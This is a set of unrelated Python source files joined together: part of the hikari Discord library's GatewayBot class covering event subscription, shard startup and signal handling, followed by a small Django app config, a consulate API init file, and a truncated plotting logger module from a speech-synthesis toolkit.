self, event_type: typing.Optional[typing.Type[event_manager_.EventT_co]] = None
) -> typing.Callable[
[event_manager_.CallbackT[event_manager_.EventT_co]],
event_manager_.CallbackT[event_manager_.EventT_co],
]:
"""Generate a decorator to subscribe a callback to an event type.
This is a second-order decorator.
Parameters
----------
event_type : typing.Optional[typing.Type[T]]
The event type to subscribe to. The implementation may allow this
to be undefined. If this is the case, the event type will be inferred
instead from the type hints on the function signature.
`T` must be a subclass of `hikari.events.base_events.Event`.
Returns
-------
typing.Callable[[T], T]
A decorator for a coroutine function that passes it to
`EventManager.subscribe` before returning the function
reference.
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
return self._event_manager.listen(event_type)
@staticmethod
def print_banner(
banner: typing.Optional[str],
allow_color: bool,
force_color: bool,
extra_args: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
"""Print the banner.
This allows library vendors to override this behaviour, or choose to
inject their own "branding" on top of what hikari provides by default.
Normal users should not need to invoke this function, and can simply
change the `banner` argument passed to the constructor to manipulate
what is displayed.
Parameters
----------
banner : typing.Optional[builtins.str]
The package to find a `banner.txt` in.
allow_color : builtins.bool
A flag that allows advising whether to allow color if supported or
not. Can be overridden by setting a `"CLICOLOR"` environment
variable to a non-`"0"` string.
force_color : builtins.bool
A flag that allows forcing color to always be output, even if the
terminal device may not support it. Setting the `"CLICOLOR_FORCE"`
environment variable to a non-`"0"` string will override this.
!!! note
`force_color` will always take precedence over `allow_color`.
extra_args : typing.Optional[typing.Dict[builtins.str, builtins.str]]
If provided, extra $-substitutions to use when printing the banner.
Default substitutions can not be overwritten.
Raises
------
builtins.ValueError
If `extra_args` contains a default $-substitution.
"""
ux.print_banner(banner, allow_color, force_color, extra_args=extra_args)
def run(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
asyncio_debug: typing.Optional[bool] = None,
check_for_updates: bool = True,
close_passed_executor: bool = False,
close_loop: bool = True,
coroutine_tracking_depth: typing.Optional[int] = None,
enable_signal_handlers: typing.Optional[bool] = None,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
propagate_interrupts: bool = False,
status: presences.Status = presences.Status.ONLINE,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
asyncio_debug : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, then debugging is
enabled for the asyncio event loop in use.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
close_passed_executor : builtins.bool
Defaults to `builtins.False`. If `builtins.True`, any custom
`concurrent.futures.Executor` passed to the constructor will be
shut down when the application terminates. This does not affect the
default executor associated with the event loop, and will not
do anything if you do not provide a custom executor to the
constructor.
close_loop : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, then once the bot
enters a state where all components have shut down permanently
during application shutdown, then all asyncgens and background tasks
will be destroyed, and the event loop will be shut down.
This will wait until all `hikari`-owned `aiohttp` connectors have
had time to attempt to shut down correctly (around 250ms), and on
Python 3.9 and newer, will also shut down the default event loop
executor too.
coroutine_tracking_depth : typing.Optional[builtins.int]
Defaults to `builtins.None`. If an integer value and supported by
the interpreter, then this many nested coroutine calls will be
tracked with their call origin state. This allows you to determine
where non-awaited coroutines may originate from, but generally you
do not want to leave this enabled for performance reasons.
enable_signal_handlers : typing.Optional[builtins.bool]
Defaults to `builtins.True` if this is started in the main thread.
If on a __non-Windows__ OS with builtin support for kernel-level
POSIX signals, then setting this to `builtins.True` will allow
treating keyboard interrupts and other OS signals to safely shut
down the application as calls to shut down the application properly
rather than just killing the process in a dirty state immediately.
You should leave this enabled unless you plan to implement your own
signal handling yourself.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
propagate_interrupts : builtins.bool
Defaults to `builtins.False`. If set to `builtins.True`, then any
internal `hikari.errors.HikariInterrupt` that is raises as a
result of catching an OS level signal will result in the
exception being rethrown once the application has closed. This can
allow you to use hikari signal handlers and still be able to
determine what kind of interrupt the application received after
it closes. When `builtins.False`, nothing is raised and the call
will terminate cleanly and silently where possible instead.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
loop = aio.get_or_make_loop()
signals = ("SIGINT", "SIGTERM")
if asyncio_debug:
loop.set_debug(True)
if coroutine_tracking_depth is not None:
try:
# Provisionally defined in CPython, may be removed without notice.
sys.set_coroutine_origin_tracking_depth(coroutine_tracking_depth)
except AttributeError:
_LOGGER.log(ux.TRACE, "cannot set coroutine tracking depth for sys, no functionality exists for this")
# Throwing this in the handler will lead to lots of fun OS specific shenanigans. So, lets just
# cache it for later, I guess.
interrupt: typing.Optional[errors.HikariInterrupt] = None
loop_thread_id = threading.get_native_id()
def handle_os_interrupt(signum: int, frame: typing.Optional[types.FrameType]) -> None:
# If we use a POSIX system, then raising an exception in here works perfectly and shuts the loop down
# with an exception, which is good.
# Windows, however, is special on this front. On Windows, the exception is caught by whatever was
# currently running on the event loop at the time, which is annoying for us, as this could be fired into
# the task for an event dispatch, for example, which is a guarded call that is never waited for by design.
# We can't always safely intercept this either, as Windows does not allow us to use asyncio loop
# signal listeners (since Windows doesn't have kernel-level signals, only emulated system calls
# for a remote few standard C signal types). Thus, the best solution here is to set the close bit
# instead, which will let the bot start to clean itself up as if the user closed it manually via a call
# to `bot.close()`.
nonlocal interrupt
signame = signal.strsignal(signum)
assert signame is not None # Will always be True
interrupt = errors.HikariInterrupt(signum, signame)
# The loop may or may not be running, depending on the state of the application when this occurs.
# Signals on POSIX only occur on the main thread usually, too, so we need to ensure this is
# threadsafe if we want the user's application to still shut down if on a separate thread.
# We log native thread IDs purely for debugging purposes.
if _LOGGER.isEnabledFor(ux.TRACE):
_LOGGER.log(
ux.TRACE,
"interrupt %s occurred on thread %s, bot on thread %s will be notified to shut down shortly\n"
"Stacktrace for developer sanity:\n%s",
signum,
threading.get_native_id(),
loop_thread_id,
"".join(traceback.format_stack(frame)),
)
asyncio.run_coroutine_threadsafe(self._set_close_flag(signame, signum), loop)
if enable_signal_handlers is None:
# Signal handlers can only be registered on the main thread so we
# only default to True if this is the case.
enable_signal_handlers = threading.current_thread() is threading.main_thread()
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, handle_os_interrupt)
except AttributeError:
_LOGGER.log(ux.TRACE, "signal %s is not implemented on your platform", sig)
try:
loop.run_until_complete(
self.start(
activity=activity,
afk=afk,
check_for_updates=check_for_updates,
idle_since=idle_since,
ignore_session_start_limit=ignore_session_start_limit,
large_threshold=large_threshold,
shard_ids=shard_ids,
shard_count=shard_count,
status=status,
)
)
loop.run_until_complete(self.join())
finally:
try:
loop.run_until_complete(self._close())
if close_passed_executor and self._executor is not None:
_LOGGER.debug("shutting down executor %s", self._executor)
self._executor.shutdown(wait=True)
self._executor = None
finally:
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, signal.SIG_DFL)
except AttributeError:
# Signal not implemented probably. We should have logged this earlier.
pass
if close_loop:
_destroy_loop(loop)
_LOGGER.info("successfully terminated")
if propagate_interrupts and interrupt is not None:
raise interrupt
async def start(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
check_for_updates: bool = True,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
status: presences.Status = presences.Status.ONLINE,
) -> None:
"""Start the bot, wait for all shards to become ready, and then return.
Other Parameters
----------------
activity : typing.Optional[hikari.presences.Activity]
The initial activity to display in the bot user presence, or
`builtins.None` (default) to not show any.
afk : builtins.bool
The initial AFK state to display in the bot user presence, or
`builtins.False` (default) to not show any.
check_for_updates : builtins.bool
Defaults to `builtins.True`. If `builtins.True`, will check for
newer versions of `hikari` on PyPI and notify if available.
idle_since : typing.Optional[datetime.datetime]
The `datetime.datetime` the user should be marked as being idle
since, or `builtins.None` (default) to not show this.
ignore_session_start_limit : builtins.bool
Defaults to `builtins.False`. If `builtins.False`, then attempting
to start more sessions than you are allowed in a 24 hour window
will throw a `hikari.errors.GatewayError` rather than going ahead
and hitting the IDENTIFY limit, which may result in your token
being reset. Setting to `builtins.True` disables this behavior.
large_threshold : builtins.int
Threshold for members in a guild before it is treated as being
"large" and no longer sending member details in the `GUILD CREATE`
event. Defaults to `250`.
shard_ids : typing.Optional[typing.AbstractSet[builtins.int]]
The shard IDs to create shards for. If not `builtins.None`, then
a non-`None` `shard_count` must ALSO be provided. Defaults to
`builtins.None`, which means the Discord-recommended count is used
for your application instead.
shard_count : typing.Optional[builtins.int]
The number of shards to use in the entire distributed application.
Defaults to `builtins.None` which results in the count being
determined dynamically on startup.
status : hikari.presences.Status
The initial status to show for the user presence on startup.
Defaults to `hikari.presences.Status.ONLINE`.
Raises
------
hikari.errors.ComponentStateConflictError
If bot is already running.
builtins.TypeError
If `shard_ids` is passed without `shard_count`.
"""
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
_validate_activity(activity)
start_time = time.monotonic()
self._rest.start()
self._voice.start()
self._closing_event = asyncio.Event()
self._is_alive = True
if check_for_updates:
asyncio.create_task(
ux.check_for_updates(self._http_settings, self._proxy_settings),
name="check for package updates",
)
requirements = await self._rest.fetch_gateway_bot_info()
await self._event_manager.dispatch(self._event_factory.deserialize_starting_event())
if shard_count is None:
shard_count = requirements.shard_count
if shard_ids is None:
shard_ids = set(range(shard_count))
if requirements.session_start_limit.remaining < len(shard_ids) and not ignore_session_start_limit:
_LOGGER.critical(
"would have started %s session%s, but you only have %s session%s remaining until %s. Starting more "
"sessions than you are allowed to start may result in your token being reset. To skip this message, "
"use bot.run(..., ignore_session_start_limit=True) or bot.start(..., ignore_session_start_limit=True)",
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
)
raise errors.GatewayError("Attempted to start more sessions than were allowed in the given time-window")
_LOGGER.info(
"you can start %s session%s before the next window which starts at %s; planning to start %s session%s... ",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
)
for window_start in range(0, shard_count, requirements.session_start_limit.max_concurrency):
window = [
candidate_shard_id
for candidate_shard_id in range(
window_start, window_start + requirements.session_start_limit.max_concurrency
)
if candidate_shard_id in shard_ids
]
if not window:
continue
if self._shards:
close_waiter = asyncio.create_task(self._closing_event.wait())
shard_joiners = [s.join() for s in self._shards.values()]
try:
# Attempt to wait for all started shards, for 5 seconds, along with the close
# waiter.
# If the close flag is set (i.e. user invoked bot.close), or one or more shards
# die in this time, we shut down immediately.
# If we time out, the joining tasks get discarded and we spin up the next
# block of shards, if applicable.
_LOGGER.info("the next startup window is in 5 seconds, please wait...")
await aio.first_completed(aio.all_of(*shard_joiners, timeout=5), close_waiter)
if not close_waiter.cancelled():
_LOGGER.info("requested to shut down during startup of shards")
else:
_LOGGER.critical("one or more shards shut down unexpectedly during bot startup")
return
except asyncio.TimeoutError:
# If any shards stopped silently, we should close.
if any(not s.is_alive for s in self._shards.values()):
_LOGGER.warning("one of the shards has been manually shut down (no error), will now shut down")
await self._close()
return
# new window starts.
except Exception as ex:
_LOGGER.critical("an exception occurred in one of the started shards during bot startup: %r", ex)
raise
await aio.all_of(
*(
self._start_one_shard(
activity=activity,
afk=afk,
idle_since=idle_since,
status=status,
large_threshold=large_threshold,
shard_id=candidate_shard_id,
shard_count=shard_count,
url=requirements.url,
closing_event=self._closing_event,
)
for candidate_shard_id in window
if candidate_shard_id in shard_ids
)
)
await self._event_manager.dispatch(self._event_factory.deserialize_started_event())
_LOGGER.info("started successfully in approx %.2f seconds", time.monotonic() - start_time)
def stream(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
limit: typing.Optional[int] = None,
) -> event_manager_.EventStream[event_manager_.EventT_co]:
"""Return a stream iterator for the given event and sub-events.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
timeout : typing.Optional[builtins.int, builtins.float]
How long this streamer should wait for the next event before
ending the iteration. If `builtins.None` then this will continue
until explicitly broken from.
limit : typing.Optional[builtins.int]
The limit for how many events this should queue at one time before
dropping extra incoming events, leave this as `builtins.None` for
the cache size to be unlimited.
Returns
-------
EventStream[hikari.events.base_events.Event]
The async iterator to handle streamed events. This must be started
with `with stream:` or `stream.open()` before
asynchronously iterating over it.
!!! warning
If you use `stream.open()` to start the stream then you must
also close it with `stream.close()` otherwise it may queue
events in memory indefinitely.
Examples
--------
```py
with bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id)) as stream:
async for user_id in stream.map("user_id").limit(50):
...
```
or using `open()` and `close()`
```py
stream = bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id))
stream.open()
async for user_id in stream.map("user_id").limit(50)
...
stream.close()
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._check_if_alive()
return self._event_manager.stream(event_type, timeout=timeout, limit=limit)
def subscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Subscribe a given callback to a given event type.
Parameters
----------
event_type : typing.Type[T]
The event type to listen for. This will also listen for any
subclasses of the given type.
`T` must be a subclass of `hikari.events.base_events.Event`.
callback
Must be a coroutine function to invoke. This should
consume an instance of the given event, or an instance of a valid
subclass if one exists. Any result is discarded.
Example
-------
The following demonstrates subscribing a callback to message creation
events.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.subscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.subscribe(event_type, callback)
def unsubscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Unsubscribe a given callback from a given event type, if present.
Parameters
----------
event_type : typing.Type[T]
The event type to unsubscribe from. This must be the same exact
type as was originally subscribed with to be removed correctly.
`T` must derive from `hikari.events.base_events.Event`.
callback
The callback to unsubscribe.
Example
-------
The following demonstrates unsubscribing a callback from a message
creation event.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.unsubscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.unsubscribe(event_type, callback)
async def wait_for(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
predicate: typing.Optional[event_manager_.PredicateT[event_manager_.EventT_co]] = None,
) -> event_manager_.EventT_co:
"""Wait for a given event to occur once, then return the event.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
predicate
A function taking the event as the single parameter.
This should return `builtins.True` if the event is one you want to
return, or `builtins.False` if the event should not be returned.
If left as `None` (the default), then the first matching event type
that the bot receives (or any subtype) will be the one returned.
!!! warning
Async predicates are not supported.
timeout : typing.Union[builtins.float, builtins.int, builtins.None]
The amount of time to wait before raising an `asyncio.TimeoutError`
and giving up instead. This is measured in seconds. If
`builtins.None`, then no timeout will be waited for (no timeout can
result in "leaking" of coroutines that never complete if called in
an uncontrolled way, so is not recommended).
Returns
-------
hikari.events.base_events.Event
The event that was provided.
Raises
------
asyncio.TimeoutError
If the timeout is not `builtins.None` and is reached before an
event is received that the predicate returns `builtins.True` for.
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
"""
self._check_if_alive()
return await self._event_manager.wait_for(event_type, timeout=timeout, predicate=predicate)
def _get_shard(self, guild: snowflakes.SnowflakeishOr[guilds.PartialGuild]) -> gateway_shard.GatewayShard:
guild = snowflakes.Snowflake(guild)
if shard := self._shards.get(snowflakes.calculate_shard_id(self.shard_count, guild)):
return shard
raise RuntimeError(f"Guild {guild} isn't covered by any of the shards in this client")
async def update_presence(
self,
*,
status: undefined.UndefinedOr[presences.Status] = undefined.UNDEFINED,
idle_since: undefined.UndefinedNoneOr[datetime.datetime] = undefined.UNDEFINED,
activity: undefined.UndefinedNoneOr[presences.Activity] = undefined.UNDEFINED,
afk: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
_validate_activity(activity)
coros = [
s.update_presence(status=status, activity=activity, idle_since=idle_since, afk=afk)
for s in self._shards.values()
]
await aio.all_of(*coros)
async def update_voice_state(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
channel: typing.Optional[snowflakes.SnowflakeishOr[channels.GuildVoiceChannel]],
*,
self_mute: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
self_deaf: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.update_voice_state(guild=guild, channel=channel, self_mute=self_mute, self_deaf=self_deaf)
async def request_guild_members(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
*,
include_presences: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
query: str = "",
limit: int = 0,
users: undefined.UndefinedOr[snowflakes.SnowflakeishSequence[users_.User]] = undefined.UNDEFINED,
nonce: undefined.UndefinedOr[str] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.request_guild_members(
guild=guild, include_presences=include_presences, query=query, limit=limit, users=users, nonce=nonce
)
async def _set_close_flag(self, signame: str, signum: int) -> None:
# This needs to be a coroutine, as the closing event is not threadsafe, so we have no way to set this
# from a Unix system call handler if we are running on a thread that isn't the main application thread
# without getting undefined behaviour. We do however have `asyncio.run_coroutine_threadsafe` which can
# run a coroutine function on the event loop from a completely different thread, so this is the safest
# solution.
_LOGGER.debug("received interrupt %s (%s), will start shutting down shortly", signame, signum)
await self._close()
async def _start_one_shard(
self,
activity: typing.Optional[presences.Activity],
afk: bool,
idle_since: typing.Optional[datetime.datetime],
status: presences.Status,
large_threshold: int,
shard_id: int,
shard_count: int,
url: str,
closing_event: asyncio.Event,
) -> shard_impl.GatewayShardImpl:
new_shard = shard_impl.GatewayShardImpl(
http_settings=self._http_settings,
proxy_settings=self._proxy_settings,
event_manager=self._event_manager,
event_factory=self._event_factory,
intents=self._intents,
initial_activity=activity,
initial_is_afk=afk,
initial_idle_since=idle_since,
initial_status=status,
large_threshold=large_threshold,
shard_id=shard_id,
shard_count=shard_count,
token=self._token,
url=url,
)
self._shards[shard_id] = new_shard
start = time.monotonic()
await aio.first_completed(new_shard.start(), closing_event.wait())
end = time.monotonic()
if new_shard.is_alive:
_LOGGER.debug("shard %s started successfully in %.1fms", shard_id, (end - start) * 1_000)
return new_shard
raise errors.GatewayError(f"shard {shard_id} shut down immediately when starting")
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from __future__ import unicode_literals
from django.apps import AppConfig
class PipelinePluginsConfig(AppConfig):
name = 'pipeline_plugins'
|
logging = False
def log(string):
if logging:
print(string)
|
"""
Consul API Endpoints
"""
from consulate.api.acl import ACL
from consulate.api.agent import Agent
from consulate.api.base import Response
from consulate.api.catalog import Catalog
from consulate.api.coordinate import Coordinate
from consulate.api.event import Event
from consulate.api.health import Health
from consulate.api.kv import KV
from consulate.api.lock import Lock
from consulate.api.session import Session
from consulate.api.status import Status
__all__ = ["ACL", "Agent", "Catalog", "Event", "Health", "KV", "Lock", "Session", "Status", "Response", "Coordinate"]
|
################################################################################
# The Neural Network (NN) based Speech Synthesis System
# https://svn.ecdf.ed.ac.uk/repo/inf/dnn_tts/
#
# Centre for Speech Technology Research
# University of Edinburgh, UK
# Copyright (c) 2014-2015
# All Rights Reserved.
#
# The system as a whole and most of the files in it are distributed
# under the following copyright and conditions
#
# Permission is hereby granted, free of charge, to use and distribute
# this software and its documentation without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of this work, and to
# permit persons to whom this work is furnished to do so, subject to
# the following conditions:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# - The authors' names may not be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
import math
import string
import os
# this module provides the base classes that we specialise here
import logging # as logging
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter, attrgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
# class PlotHandler(logging.FileHandler):
# """A handler for saving plots to disk"""
# def __init__(self,filename):
# logging.FileHandler.__init__(self,filename, mode='a', encoding=None, delay=False)
class PlotWithData(object):
# a generic plot object that contains both the underlying data and the plot itself
# this class needs to be subclassed for each specialised type of plot that we want
# the underlying data for the plot - a dictionary of data series
# each series is a list of data points of arbitrary type (e.g., tuples, arrays, ..)
data=None
# the plot generated from these data
plot=None
def __init__(self,name):
# clear the data series
self.data={}
def add_data_point(self,series_name,data_point):
# if there is no data series with this name yet, create an empty one
if series_name not in self.data:
self.data[series_name]=[]
# append this data point (e.g., it might be a tuple (x,y) )
# don't worry about data type or sorting - that is not our concern here
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
try:
assert len(self.data) > 0
except AssertionError:
logger.critical('No data series found in plot')
raise
# check lengths are consistent, sort, then check x values are identical
l=-1
reference_x=None
# print "starting with self.data=",self.data
for series_name,data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self,**kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData' )
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self,filename,title='',xlabel='',ylabel='',xlim=None,ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name,data_points in self.data.items():
xpoints=numpy.asarray([seq[0] for seq in data_points])
ypoints=numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel=''):
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
else: ## still plotting multiple image in one figure still has problem. the visualization is not good
logger.error('no supported yet')
self.plot.colorbar(im_data)
self.plot.savefig(filename) #, bbox_inches='tight'
#class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
"""Based on the built-in logging class, with added capabilities including plotting"""
# a dictionary to store all generated plots
# keys are plot names
# values are
plots ={}
# where the plots will be saved - a directory
plot_path='/tmp' # default location
def __init__(self,name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self,name)
def set_plot_path(self,path):
self.plot_path = path
def remove_all_plots(self):
self.plots={}
def create_plot(self,plot_name,plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self,plot_name,series_name,data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name,data_point)
def save_plot(self,plot_name,**kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
logger.warn('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
# # (behaviour will be unpredictable if there is more than one handler of this type)
# if isinstance(h,PlotHandler):
# ph=h
# break
# if ph:
# TO DO - need to be sure of safe file names
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
filename = self.plot_path + "/" + string.replace(plot_name, " ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename,**kwargs)
# else:
# logger.warn('No handler of type PlotHandler is attached to this logger - cannot save plots')
class ColouredFormatter(logging.Formatter):
